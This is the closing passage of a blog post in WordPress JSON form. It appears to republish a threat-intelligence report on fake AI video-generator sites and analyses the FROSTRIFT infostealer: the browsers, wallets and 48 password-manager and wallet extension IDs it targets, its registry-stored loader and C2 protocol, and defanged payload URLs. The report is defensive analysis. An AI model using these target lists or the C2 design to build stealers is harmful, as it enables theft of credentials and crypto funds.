    Software Applications<\/td>\ncom.liberty.jaxx<\/p>\n
    Foxmail<\/p>\n
    Telegram<\/p>\n
    Browsers (see Table 10)<\/td>\n<\/tr>\n
    Standalone Crypto Wallets<\/td>\nAtomic, Bitcoin-Qt, Dash-Qt, Electrum, Ethereum, Exodus, Litecoin-Qt, Zcash, Ledger Live<\/td>\n<\/tr>\n
    Browser Extension<\/td>\nPassword managers, Authenticators, and Digital wallets (see Table 11)<\/td>\n<\/tr>\n
    Others<\/td>\n5th entry from the Config (\u201cDefault\u201d in this sample)<\/p>\n
    Malware full file path<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    Table 9: Collected information<\/div>\n
    <\/div>\n
    FROSTRIFT checks for the existence of the following browsers:<\/div>\n
    Chromium, Chrome, Brave, Edge, QQBrowser, ChromePlus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa, Elements Browser, Epic Privacy Browser, uCozMedia Uran, Sleipnir5, Citrio, Coowon, liebao, QIP Surf, Orbitum, Dragon, Amigo, Torch, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Atom<\/div>\n<\/section>\n
    \n
    \n
    \n
    Table 10: List of browsers<\/p>\n<\/div>\n<\/section>\n
    \n
    \n
    FROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and Digital wallets. The full list is provided in Table 11.<\/p>\n\n\n\n<\/colgroup>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    String<\/td>\nExtension<\/td>\n<\/tr>\n
    ibnejdfjmmkpcnlpebklmnkoeoihofec<\/td>\nTronLink<\/td>\n<\/tr>\n
    nkbihfbeogaeaoehlefnkodbefgpgknn<\/td>\nMetaMask<\/td>\n<\/tr>\n
    fhbohimaelbohpjbbldcngcnapndodjp<\/td>\nBinance Chain Wallet<\/td>\n<\/tr>\n
    ffnbelfdoeiohenkjibnmadjiehjhajb<\/td>\nYoroi<\/td>\n<\/tr>\n
    cjelfplplebdjjenllpjcblmjkfcffne<\/td>\nJaxx Liberty<\/td>\n<\/tr>\n
    fihkakfobkmkjojpchpfgcmhfjnmnfpi<\/td>\nBitApp Wallet<\/td>\n<\/tr>\n
    kncchdigobghenbbaddojjnnaogfppfj<\/td>\niWallet<\/td>\n<\/tr>\n
    aiifbnbfobpmeekipheeijimdpnlpgpp<\/td>\nTerra Station<\/td>\n<\/tr>\n
    ijmpgkjfkbfhoebgogflfebnmejmfbml<\/td>\nBitClip<\/td>\n<\/tr>\n
    blnieiiffboillknjnepogjhkgnoapac<\/td>\nEQUAL Wallet<\/td>\n<\/tr>\n
    amkmjjmmflddogmhpjloimipbofnfjih<\/td>\nWombat<\/td>\n<\/tr>\n
    jbdaocneiiinmjbjlgalhcelgbejmnid<\/td>\nNifty Wallet<\/td>\n<\/tr>\n
    afbcbjpbpfadlkmhmclhkeeodmamcflc<\/td>\nMath Wallet<\/td>\n<\/tr>\n
    hpglfhgfnhbgpjdenjgmdgoeiappafln<\/td>\nGuarda<\/td>\n<\/tr>\n
    aeachknmefphepccionboohckonoeemg<\/td>\nCoin98 Wallet<\/td>\n<\/tr>\n
    imloifkgjagghnncjkhggdhalmcnfklk<\/td>\nTrezor Password Manager<\/td>\n<\/tr>\n
    oeljdldpnmdbchonielidgobddffflal<\/td>\nEOS Authenticator<\/td>\n<\/tr>\n
    gaedmjdfmmahhbjefcbgaolhhanlaolb<\/td>\nAuthy<\/td>\n<\/tr>\n
    ilgcnhelpchnceeipipijaljkblbcobl<\/td>\nGAuth Authenticator<\/td>\n<\/tr>\n
    bhghoamapcdpbohphigoooaddinpkbai<\/td>\nAuthenticator<\/td>\n<\/tr>\n
    mnfifefkajgofkcjkemidiaecocnkjeh<\/td>\nTezBox<\/td>\n<\/tr>\n
    dkdedlpgdmmkkfjabffeganieamfklkm<\/td>\nCyano Wallet<\/td>\n<\/tr>\n
    aholpfdialjgjfhomihkjbmgjidlcdno<\/td>\nExodus Web3<\/td>\n<\/tr>\n
    jiidiaalihmmhddjgbnbgdfflelocpak<\/td>\nBitKeep<\/td>\n<\/tr>\n
    hnfanknocfeofbddgcijnmhnfnkdnaad<\/td>\nCoinbase Wallet<\/td>\n<\/tr>\n
    egjidjbpglichdcondbcbdnbeeppgdph<\/td>\nTrust Wallet<\/td>\n<\/tr>\n
    hmeobnfnfcmdkdcmlblgagmfpfboieaf<\/td>\nXDEFI Wallet<\/td>\n<\/tr>\n
    bfnaelmomeimhlpmgjnjophhpkkoljpa<\/td>\nPhantom<\/td>\n<\/tr>\n
    fcckkdbjnoikooededlapcalpionmalo<\/td>\nMOBOX WALLET<\/td>\n<\/tr>\n
    bocpokimicclpaiekenaeelehdjllofo<\/td>\nXDCPay<\/td>\n<\/tr>\n
    flpiciilemghbmfalicajoolhkkenfel<\/td>\nICONex<\/td>\n<\/tr>\n
    hfljlochmlccoobkbcgpmkpjagogcgpk<\/td>\nSolana Wallet<\/td>\n<\/tr>\n
    cmndjbecilbocjfkibfbifhngkdmjgog<\/td>\nSwash<\/td>\n<\/tr>\n
    cjmkndjhnagcfbpiemnkdpomccnjblmj<\/td>\nFinnie<\/td>\n<\/tr>\n
    knogkgcdfhhbddcghachkejeap<\/td>\nKeplr<\/td>\n<\/tr>\n
    kpfopkelmapcoipemfendmdcghnegimn<\/td>\nLiquality Wallet<\/td>\n<\/tr>\n
    hgmoaheomcjnaheggkfafnjilfcefbmo<\/td>\nRabet<\/td>\n<\/tr>\n
    fnjhmkhhmkbjkkabndcnnogagogbneec<\/td>\nRonin Wallet<\/td>\n<\/tr>\n
    klnaejjgbibmhlephnhpmaofohgkpgkd<\/td>\nZilPay<\/td>\n<\/tr>\n
    ejbalbakoplchlghecdalmeeeajnimhm<\/td>\nMetaMask<\/td>\n<\/tr>\n
    ghocjofkdpicneaokfekohclmkfmepbp<\/td>\nExodus Web3<\/td>\n<\/tr>\n
    heaomjafhiehddpnmncmhhpjaloainkn<\/td>\nTrust Wallet<\/td>\n<\/tr>\n
    hkkpjehhcnhgefhbdcgfkeegglpjchdc<\/td>\nBraavos Smart Wallet<\/td>\n<\/tr>\n
    akoiaibnepcedcplijmiamnaigbepmcb<\/td>\nYoroi<\/td>\n<\/tr>\n
    djclckkglechooblngghdinmeemkbgci<\/td>\nMetaMask<\/td>\n<\/tr>\n
    acdamagkdfmpkclpoglgnbddngblgibo<\/td>\nGuarda Wallet<\/td>\n<\/tr>\n
    okejhknhopdbemmfefjglkdfdhpfmflg<\/td>\nBitKeep<\/td>\n<\/tr>\n
    mijjdbgpgbflkaooedaemnlciddmamai<\/td>\nWaves Keeper<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    Table 11: List of browser extensions<\/p>\n
    C2 Communication<\/h5>\n
    The malware expects the C2 to respond by sending\u00a0GZIP<\/code>-compressed Protobuf messages with the following fields:<\/p>\n
      \n
    • registry_val<\/code>: A registry value under\u00a0HKCU\\Software\\<victim_id><\/code>\u00a0to store the loader_bytes.<\/li>\n
    • loader_bytes<\/code>: Assembly module to load the loaded_bytes (stored at registry in reverse order).<\/li>\n
    • loaded_bytes<\/code>: GZIP-compressed assembly module to be loaded in-memory.<\/li>\n<\/ul>\n
      The sample receives\u00a0loader_bytes<\/code>\u00a0only in the first message as it stores it under the registry value\u00a0HKCU\\Software\\<victim_id>\\registry_val<\/code>. For the subsequent messages, it only receives\u00a0registry_val<\/code>\u00a0which it uses to fetch\u00a0loader_bytes<\/code>\u00a0from the registry.<\/p>\n
      The sample sends empty\u00a0GZIP<\/code>-compressed Protobuf messages as a keep-alive mechanism until the C2 sends another assembly module to be loaded.<\/p>\n
      The malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not enabled in this sample):<\/p>\n
        \n
      • WebDriver2.exe<\/code>: hxxps:\/\/github[.]com\/DFfe9ewf\/test3\/raw\/refs\/heads\/main\/WebDriver.dll;<\/li>\n
      • chromedriver2.exe<\/code>: hxxps:\/\/github[.]com\/DFfe9ewf\/test3\/raw\/refs\/heads\/main\/chromedriver.exe<\/li>\n
      • msedgedriver2.exe<\/code>: hxxps:\/\/github[.]com\/DFfe9ewf\/test3\/raw\/refs\/heads\/main\/msedgedriver.exe<\/li>\n<\/ul>\n
        The files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can also be used by attackers for malicious purposes, such as deploying additional payloads.<\/p>\n
        Conclusion<\/h2>\n
        As AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have taken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake \u201cAI websites\u201d pose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers; anyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a victim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website’s domain.<\/p>\n<\/div>\n<\/section>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
        Since November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest around AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes fake \u201cAI video generator\u201d websites to distribute malware leading to the deployment of payloads such as Python-based infostealers and […]<\/p>\n","protected":false},"author":1,"featured_media":12361,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[438],"tags":[],"class_list":["post-11999","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology"],"acf":{"custom_meta_title":"Text-to-Malware: How Cybercriminals Exploit Fake AI Websites for Attacks","meta_description":"Discover how cybercriminals are using fake AI-themed websites to distribute malware through deceptive \"text-to-AI\" tools. Learn how these scams work\u2014and how to protect yourself.","meta_keyword":"","other_meta_tag":""},"_links":{"self":[{"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/posts\/11999"}],"collection":[{"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/comments?post=11999"}],"version-history":[{"count":3,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/posts\/11999\/revisions"}],"predecessor-version":[{"id":12363,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/posts\/11999\/revisions\/12363"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/media\/12361"}],"wp:attachment":[{"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/media?parent=11999"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/categories?post=11999"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ntspl.co.in\/blog\/wp-json\/wp\/v2\/tags?post=11999"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}